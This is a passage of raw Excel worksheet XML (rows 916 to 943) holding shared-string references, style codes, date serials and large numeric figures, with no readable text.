        <v>5</v>
      </c>
      <c r="B916" s="52"/>
      <c r="C916" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D916" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E916" s="95" t="s">
        <v>2881</v>
      </c>
      <c r="F916" s="42">
        <v>100</v>
      </c>
      <c r="G916" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H916" t="s">
        <v>2882</v>
      </c>
      <c r="I916" t="s">
        <v>179</v>
      </c>
      <c r="J916" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="K916" s="95" t="s">
        <v>23</v>
      </c>
      <c r="L916" t="s">
        <v>77</v>
      </c>
      <c r="M916" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="N916" t="s">
        <v>1007</v>
      </c>
      <c r="P916" t="s">
        <v>942</v>
      </c>
      <c r="Q916" s="95" t="s">
        <v>2883</v>
      </c>
      <c r="W916" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="917" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A917" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B917" s="52"/>
      <c r="C917" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D917" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E917" s="95" t="s">
        <v>2884</v>
      </c>
      <c r="F917" s="42">
        <v>100</v>
      </c>
      <c r="G917" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H917" t="s">
        <v>2885</v>
      </c>
      <c r="I917" t="s">
        <v>82</v>
      </c>
      <c r="J917" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K917" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L917" t="s">
        <v>83</v>
      </c>
      <c r="M917" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q917" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W917" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="918" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A918" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B918" s="52">
        <v>44154.519527986115</v>
      </c>
      <c r="C918" s="95" t="s">
        <v>2886</v>
      </c>
      <c r="D918" s="96">
        <v>101</v>
      </c>
      <c r="E918" s="95" t="s">
        <v>2887</v>
      </c>
      <c r="F918" s="42">
        <v>101</v>
      </c>
      <c r="G918" s="95" t="s">
        <v>2888</v>
      </c>
      <c r="H918" t="s">
        <v>2889</v>
      </c>
      <c r="I918" t="s">
        <v>75</v>
      </c>
      <c r="J918" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K918" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L918" t="s">
        <v>77</v>
      </c>
      <c r="M918" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q918" s="95" t="s">
        <v>2890</v>
      </c>
      <c r="R918">
        <v>730176</v>
      </c>
      <c r="S918">
        <v>665617</v>
      </c>
      <c r="T918">
        <v>635359</v>
      </c>
      <c r="U918">
        <v>567594</v>
      </c>
      <c r="V918">
        <v>705142</v>
      </c>
      <c r="W918" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="919" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A919" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B919" s="52">
        <v>44624.74904328704</v>
      </c>
      <c r="C919" s="95" t="s">
        <v>2886</v>
      </c>
      <c r="D919" s="96">
        <v>200</v>
      </c>
      <c r="E919" s="95" t="s">
        <v>2887</v>
      </c>
      <c r="F919" s="42">
        <v>200</v>
      </c>
      <c r="G919" s="95" t="s">
        <v>2888</v>
      </c>
      <c r="H919" t="s">
        <v>2889</v>
      </c>
      <c r="I919" t="s">
        <v>75</v>
      </c>
      <c r="J919" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K919" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L919" t="s">
        <v>77</v>
      </c>
      <c r="M919" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q919" s="95" t="s">
        <v>2891</v>
      </c>
      <c r="R919">
        <v>730176</v>
      </c>
      <c r="S919">
        <v>665617</v>
      </c>
      <c r="T919">
        <v>635359</v>
      </c>
      <c r="U919">
        <v>567594</v>
      </c>
      <c r="V919">
        <v>705142</v>
      </c>
      <c r="W919" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="920" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A920" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B920" s="52">
        <v>44154.519527974539</v>
      </c>
      <c r="C920" s="95" t="s">
        <v>2886</v>
      </c>
      <c r="D920" s="96">
        <v>101</v>
      </c>
      <c r="E920" s="95" t="s">
        <v>2892</v>
      </c>
      <c r="F920" s="42">
        <v>102</v>
      </c>
      <c r="G920" s="95" t="s">
        <v>2893</v>
      </c>
      <c r="H920" t="s">
        <v>2894</v>
      </c>
      <c r="I920" t="s">
        <v>75</v>
      </c>
      <c r="J920" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K920" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L920" t="s">
        <v>77</v>
      </c>
      <c r="M920" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q920" s="95" t="s">
        <v>2890</v>
      </c>
      <c r="R920">
        <v>710848</v>
      </c>
      <c r="S920">
        <v>628700</v>
      </c>
      <c r="T920">
        <v>605696</v>
      </c>
      <c r="U920">
        <v>538410</v>
      </c>
      <c r="V920">
        <v>647424</v>
      </c>
      <c r="W920" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="921" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A921" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B921" s="52">
        <v>44624.749043263888</v>
      </c>
      <c r="C921" s="95" t="s">
        <v>2886</v>
      </c>
      <c r="D921" s="96">
        <v>200</v>
      </c>
      <c r="E921" s="95" t="s">
        <v>2892</v>
      </c>
      <c r="F921" s="42">
        <v>200</v>
      </c>
      <c r="G921" s="95" t="s">
        <v>2893</v>
      </c>
      <c r="H921" t="s">
        <v>2894</v>
      </c>
      <c r="I921" t="s">
        <v>75</v>
      </c>
      <c r="J921" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K921" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L921" t="s">
        <v>77</v>
      </c>
      <c r="M921" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q921" s="95" t="s">
        <v>2891</v>
      </c>
      <c r="R921">
        <v>710848</v>
      </c>
      <c r="S921">
        <v>628700</v>
      </c>
      <c r="T921">
        <v>605696</v>
      </c>
      <c r="U921">
        <v>538410</v>
      </c>
      <c r="V921">
        <v>647424</v>
      </c>
      <c r="W921" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="922" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A922" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B922" s="52"/>
      <c r="C922" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D922" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E922" s="95" t="s">
        <v>2895</v>
      </c>
      <c r="F922" s="42">
        <v>100</v>
      </c>
      <c r="G922" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H922" t="s">
        <v>2896</v>
      </c>
      <c r="I922" t="s">
        <v>196</v>
      </c>
      <c r="J922" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K922" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L922" t="s">
        <v>77</v>
      </c>
      <c r="M922" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N922" t="s">
        <v>198</v>
      </c>
      <c r="P922" t="s">
        <v>2897</v>
      </c>
      <c r="Q922" s="95" t="s">
        <v>2898</v>
      </c>
      <c r="W922" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="923" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A923" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B923" s="52"/>
      <c r="C923" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D923" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E923" s="95" t="s">
        <v>2899</v>
      </c>
      <c r="F923" s="42">
        <v>100</v>
      </c>
      <c r="G923" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H923" t="s">
        <v>2900</v>
      </c>
      <c r="I923" t="s">
        <v>611</v>
      </c>
      <c r="J923" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K923" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L923" t="s">
        <v>77</v>
      </c>
      <c r="M923" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N923" t="s">
        <v>613</v>
      </c>
      <c r="P923" t="s">
        <v>2070</v>
      </c>
      <c r="Q923" s="95" t="s">
        <v>2901</v>
      </c>
      <c r="W923" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="924" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A924" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B924" s="52"/>
      <c r="C924" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D924" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E924" s="95" t="s">
        <v>2902</v>
      </c>
      <c r="F924" s="42">
        <v>100</v>
      </c>
      <c r="G924" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H924" t="s">
        <v>2903</v>
      </c>
      <c r="I924" t="s">
        <v>82</v>
      </c>
      <c r="J924" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K924" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L924" t="s">
        <v>83</v>
      </c>
      <c r="M924" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P924" t="s">
        <v>78</v>
      </c>
      <c r="Q924" s="95" t="s">
        <v>85</v>
      </c>
      <c r="W924" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="925" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A925" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B925" s="52"/>
      <c r="C925" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D925" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E925" s="95" t="s">
        <v>2904</v>
      </c>
      <c r="F925" s="42">
        <v>100</v>
      </c>
      <c r="G925" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H925" t="s">
        <v>2905</v>
      </c>
      <c r="I925" t="s">
        <v>75</v>
      </c>
      <c r="J925" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K925" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L925" t="s">
        <v>83</v>
      </c>
      <c r="M925" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N925" t="s">
        <v>221</v>
      </c>
      <c r="Q925" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W925" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="926" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A926" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B926" s="52"/>
      <c r="C926" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D926" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E926" s="95" t="s">
        <v>2906</v>
      </c>
      <c r="F926" s="42">
        <v>310</v>
      </c>
      <c r="G926" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H926" t="s">
        <v>2907</v>
      </c>
      <c r="I926" t="s">
        <v>611</v>
      </c>
      <c r="J926" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K926" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L926" t="s">
        <v>77</v>
      </c>
      <c r="M926" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N926" t="s">
        <v>613</v>
      </c>
      <c r="P926" t="s">
        <v>937</v>
      </c>
      <c r="Q926" s="95" t="s">
        <v>2908</v>
      </c>
      <c r="W926" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="927" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A927" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B927" s="52"/>
      <c r="C927" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D927" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E927" s="95" t="s">
        <v>2906</v>
      </c>
      <c r="F927" s="42">
        <v>400</v>
      </c>
      <c r="G927" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H927" t="s">
        <v>2907</v>
      </c>
      <c r="I927" t="s">
        <v>611</v>
      </c>
      <c r="J927" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K927" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L927" t="s">
        <v>77</v>
      </c>
      <c r="M927" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N927" t="s">
        <v>613</v>
      </c>
      <c r="P927" t="s">
        <v>937</v>
      </c>
      <c r="Q927" s="95" t="s">
        <v>2909</v>
      </c>
      <c r="W927" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="928" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A928" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B928" s="52"/>
      <c r="C928" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D928" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E928" s="95" t="s">
        <v>2906</v>
      </c>
      <c r="F928" s="42">
        <v>200</v>
      </c>
      <c r="G928" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H928" t="s">
        <v>2907</v>
      </c>
      <c r="I928" t="s">
        <v>611</v>
      </c>
      <c r="J928" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K928" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L928" t="s">
        <v>77</v>
      </c>
      <c r="M928" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N928" t="s">
        <v>613</v>
      </c>
      <c r="P928" t="s">
        <v>612</v>
      </c>
      <c r="Q928" s="95" t="s">
        <v>2910</v>
      </c>
      <c r="W928" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="929" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A929" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B929" s="52"/>
      <c r="C929" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D929" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E929" s="95" t="s">
        <v>2906</v>
      </c>
      <c r="F929" s="42">
        <v>300</v>
      </c>
      <c r="G929" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H929" t="s">
        <v>2907</v>
      </c>
      <c r="I929" t="s">
        <v>611</v>
      </c>
      <c r="J929" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K929" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L929" t="s">
        <v>77</v>
      </c>
      <c r="M929" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N929" t="s">
        <v>613</v>
      </c>
      <c r="P929" t="s">
        <v>2911</v>
      </c>
      <c r="Q929" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W929" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="930" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A930" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B930" s="52"/>
      <c r="C930" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D930" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E930" s="95" t="s">
        <v>2912</v>
      </c>
      <c r="F930" s="42">
        <v>100</v>
      </c>
      <c r="G930" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H930" t="s">
        <v>2913</v>
      </c>
      <c r="I930" t="s">
        <v>196</v>
      </c>
      <c r="J930" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K930" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L930" t="s">
        <v>77</v>
      </c>
      <c r="M930" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N930" t="s">
        <v>198</v>
      </c>
      <c r="P930" t="s">
        <v>2914</v>
      </c>
      <c r="Q930" s="95" t="s">
        <v>2915</v>
      </c>
      <c r="W930" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="931" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A931" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B931" s="52"/>
      <c r="C931" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D931" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E931" s="95" t="s">
        <v>2916</v>
      </c>
      <c r="F931" s="42">
        <v>100</v>
      </c>
      <c r="G931" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H931" t="s">
        <v>2917</v>
      </c>
      <c r="I931" t="s">
        <v>611</v>
      </c>
      <c r="J931" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K931" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L931" t="s">
        <v>77</v>
      </c>
      <c r="M931" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N931" t="s">
        <v>613</v>
      </c>
      <c r="P931" t="s">
        <v>2911</v>
      </c>
      <c r="Q931" s="95" t="s">
        <v>2918</v>
      </c>
      <c r="W931" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="932" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A932" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B932" s="52"/>
      <c r="C932" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D932" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E932" s="95" t="s">
        <v>2919</v>
      </c>
      <c r="F932" s="42">
        <v>300</v>
      </c>
      <c r="G932" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H932" t="s">
        <v>2920</v>
      </c>
      <c r="I932" t="s">
        <v>611</v>
      </c>
      <c r="J932" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K932" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L932" t="s">
        <v>77</v>
      </c>
      <c r="M932" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N932" t="s">
        <v>613</v>
      </c>
      <c r="P932" t="s">
        <v>2911</v>
      </c>
      <c r="Q932" s="95" t="s">
        <v>2921</v>
      </c>
      <c r="W932" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="933" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A933" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B933" s="52"/>
      <c r="C933" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D933" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E933" s="95" t="s">
        <v>2922</v>
      </c>
      <c r="F933" s="42">
        <v>100</v>
      </c>
      <c r="G933" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H933" t="s">
        <v>2923</v>
      </c>
      <c r="I933" t="s">
        <v>611</v>
      </c>
      <c r="J933" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K933" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L933" t="s">
        <v>77</v>
      </c>
      <c r="M933" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N933" t="s">
        <v>613</v>
      </c>
      <c r="P933" t="s">
        <v>2911</v>
      </c>
      <c r="Q933" s="95" t="s">
        <v>2924</v>
      </c>
      <c r="W933" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="934" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A934" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B934" s="52"/>
      <c r="C934" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D934" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E934" s="95" t="s">
        <v>2925</v>
      </c>
      <c r="F934" s="42">
        <v>100</v>
      </c>
      <c r="G934" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H934" t="s">
        <v>2926</v>
      </c>
      <c r="I934" t="s">
        <v>611</v>
      </c>
      <c r="J934" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K934" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L934" t="s">
        <v>77</v>
      </c>
      <c r="M934" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N934" t="s">
        <v>613</v>
      </c>
      <c r="P934" t="s">
        <v>2911</v>
      </c>
      <c r="Q934" s="95" t="s">
        <v>2918</v>
      </c>
      <c r="W934" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="935" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A935" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B935" s="52">
        <v>44019.899358391202</v>
      </c>
      <c r="C935" s="95" t="s">
        <v>2927</v>
      </c>
      <c r="D935" s="96">
        <v>100</v>
      </c>
      <c r="E935" s="95" t="s">
        <v>2928</v>
      </c>
      <c r="F935" s="42">
        <v>100</v>
      </c>
      <c r="G935" s="95" t="s">
        <v>2929</v>
      </c>
      <c r="H935" t="s">
        <v>2930</v>
      </c>
      <c r="I935" t="s">
        <v>611</v>
      </c>
      <c r="J935" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K935" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L935" t="s">
        <v>77</v>
      </c>
      <c r="M935" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N935" t="s">
        <v>1098</v>
      </c>
      <c r="O935" s="95" t="s">
        <v>2931</v>
      </c>
      <c r="Q935" s="95" t="s">
        <v>2932</v>
      </c>
      <c r="R935">
        <v>85642</v>
      </c>
      <c r="S935">
        <v>105869</v>
      </c>
      <c r="T935">
        <v>87381</v>
      </c>
      <c r="U935">
        <v>61199</v>
      </c>
      <c r="V935">
        <v>53838</v>
      </c>
      <c r="W935" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="936" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A936" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B936" s="52"/>
      <c r="C936" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D936" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E936" s="95" t="s">
        <v>2933</v>
      </c>
      <c r="F936" s="42">
        <v>200</v>
      </c>
      <c r="G936" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H936" t="s">
        <v>460</v>
      </c>
      <c r="I936" t="s">
        <v>103</v>
      </c>
      <c r="J936" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K936" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L936" t="s">
        <v>77</v>
      </c>
      <c r="M936" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P936" t="s">
        <v>246</v>
      </c>
      <c r="Q936" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W936" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="937" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A937" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B937" s="52"/>
      <c r="C937" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D937" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E937" s="95" t="s">
        <v>2934</v>
      </c>
      <c r="F937" s="42">
        <v>100</v>
      </c>
      <c r="G937" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H937" t="s">
        <v>2935</v>
      </c>
      <c r="I937" t="s">
        <v>833</v>
      </c>
      <c r="J937" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K937" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L937" t="s">
        <v>77</v>
      </c>
      <c r="M937" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N937" t="s">
        <v>835</v>
      </c>
      <c r="Q937" s="95" t="s">
        <v>880</v>
      </c>
      <c r="W937" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="938" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A938" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B938" s="52"/>
      <c r="C938" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D938" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E938" s="95" t="s">
        <v>2936</v>
      </c>
      <c r="F938" s="42">
        <v>100</v>
      </c>
      <c r="G938" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H938" t="s">
        <v>2937</v>
      </c>
      <c r="I938" t="s">
        <v>31</v>
      </c>
      <c r="J938" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K938" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L938" t="s">
        <v>77</v>
      </c>
      <c r="M938" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N938" t="s">
        <v>263</v>
      </c>
      <c r="P938" t="s">
        <v>2019</v>
      </c>
      <c r="Q938" s="95" t="s">
        <v>2023</v>
      </c>
      <c r="W938" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="939" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A939" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B939" s="52">
        <v>44491.094653958331</v>
      </c>
      <c r="C939" s="95" t="s">
        <v>2938</v>
      </c>
      <c r="D939" s="96">
        <v>102</v>
      </c>
      <c r="E939" s="95" t="s">
        <v>2939</v>
      </c>
      <c r="F939" s="42">
        <v>102</v>
      </c>
      <c r="G939" s="95" t="s">
        <v>2940</v>
      </c>
      <c r="H939" t="s">
        <v>2941</v>
      </c>
      <c r="I939" t="s">
        <v>611</v>
      </c>
      <c r="J939" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K939" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L939" t="s">
        <v>83</v>
      </c>
      <c r="M939" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N939" t="s">
        <v>149</v>
      </c>
      <c r="Q939" s="95" t="s">
        <v>2942</v>
      </c>
      <c r="R939">
        <v>3620954</v>
      </c>
      <c r="S939">
        <v>3153679</v>
      </c>
      <c r="T939">
        <v>3111027</v>
      </c>
      <c r="U939">
        <v>2976609</v>
      </c>
      <c r="V939">
        <v>3103102</v>
      </c>
      <c r="W939" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="940" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A940" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B940" s="52">
        <v>44539.690664699076</v>
      </c>
      <c r="C940" s="95" t="s">
        <v>2943</v>
      </c>
      <c r="D940" s="96">
        <v>101</v>
      </c>
      <c r="E940" s="95" t="s">
        <v>2944</v>
      </c>
      <c r="F940" s="42">
        <v>101</v>
      </c>
      <c r="G940" s="95" t="s">
        <v>2945</v>
      </c>
      <c r="H940" t="s">
        <v>2946</v>
      </c>
      <c r="I940" t="s">
        <v>172</v>
      </c>
      <c r="J940" s="95" t="s">
        <v>2947</v>
      </c>
      <c r="K940" s="95" t="s">
        <v>37</v>
      </c>
      <c r="L940" t="s">
        <v>83</v>
      </c>
      <c r="M940" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q940" s="95" t="s">
        <v>2948</v>
      </c>
      <c r="R940">
        <v>9415030</v>
      </c>
      <c r="S940">
        <v>8773075</v>
      </c>
      <c r="T940">
        <v>8976006</v>
      </c>
      <c r="U940">
        <v>8720360</v>
      </c>
      <c r="V940">
        <v>10292915</v>
      </c>
      <c r="W940" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="941" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A941" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B941" s="52">
        <v>44596.495707361108</v>
      </c>
      <c r="C941" s="95" t="s">
        <v>2943</v>
      </c>
      <c r="D941" s="96">
        <v>201</v>
      </c>
      <c r="E941" s="95" t="s">
        <v>2944</v>
      </c>
      <c r="F941" s="42">
        <v>201</v>
      </c>
      <c r="G941" s="95" t="s">
        <v>2945</v>
      </c>
      <c r="H941" t="s">
        <v>2949</v>
      </c>
      <c r="I941" t="s">
        <v>172</v>
      </c>
      <c r="J941" s="95" t="s">
        <v>2947</v>
      </c>
      <c r="K941" s="95" t="s">
        <v>37</v>
      </c>
      <c r="L941" t="s">
        <v>83</v>
      </c>
      <c r="M941" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q941" s="95" t="s">
        <v>2950</v>
      </c>
      <c r="R941">
        <v>9415030</v>
      </c>
      <c r="S941">
        <v>8773075</v>
      </c>
      <c r="T941">
        <v>8976006</v>
      </c>
      <c r="U941">
        <v>8720360</v>
      </c>
      <c r="V941">
        <v>10292915</v>
      </c>
      <c r="W941" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="942" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A942" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B942" s="52">
        <v>44390.480803171296</v>
      </c>
      <c r="C942" s="95" t="s">
        <v>2951</v>
      </c>
      <c r="D942" s="96">
        <v>101</v>
      </c>
      <c r="E942" s="95" t="s">
        <v>2952</v>
      </c>
      <c r="F942" s="42">
        <v>101</v>
      </c>
      <c r="G942" s="95" t="s">
        <v>2953</v>
      </c>
      <c r="H942" t="s">
        <v>2954</v>
      </c>
      <c r="I942" t="s">
        <v>268</v>
      </c>
      <c r="J942" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K942" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L942" t="s">
        <v>77</v>
      </c>
      <c r="M942" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N942" t="s">
        <v>271</v>
      </c>
      <c r="Q942" s="95" t="s">
        <v>2955</v>
      </c>
      <c r="U942">
        <v>1963</v>
      </c>
      <c r="V942">
        <v>21262</v>
      </c>
      <c r="W942" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="943" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A943" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B943" s="52">
        <v>44390.480803206017</v>
      </c>
      <c r="C943" s="95" t="s">
        <v>2951</v>
      </c>
      <c r="D943" s="96">
        <v>101</v>
      </c>
      <c r="E943" s="95" t="s">
        <v>2956</v>
      </c>
      <c r="F943" s="42">
        <v>101</v>
      </c>
      <c r="G943" s="95" t="s">
        <v>2957</v>
      </c>
      <c r="H943" t="s">
        <v>2958</v>
      </c>
      <c r="I943" t="s">
        <v>268</v>
      </c>
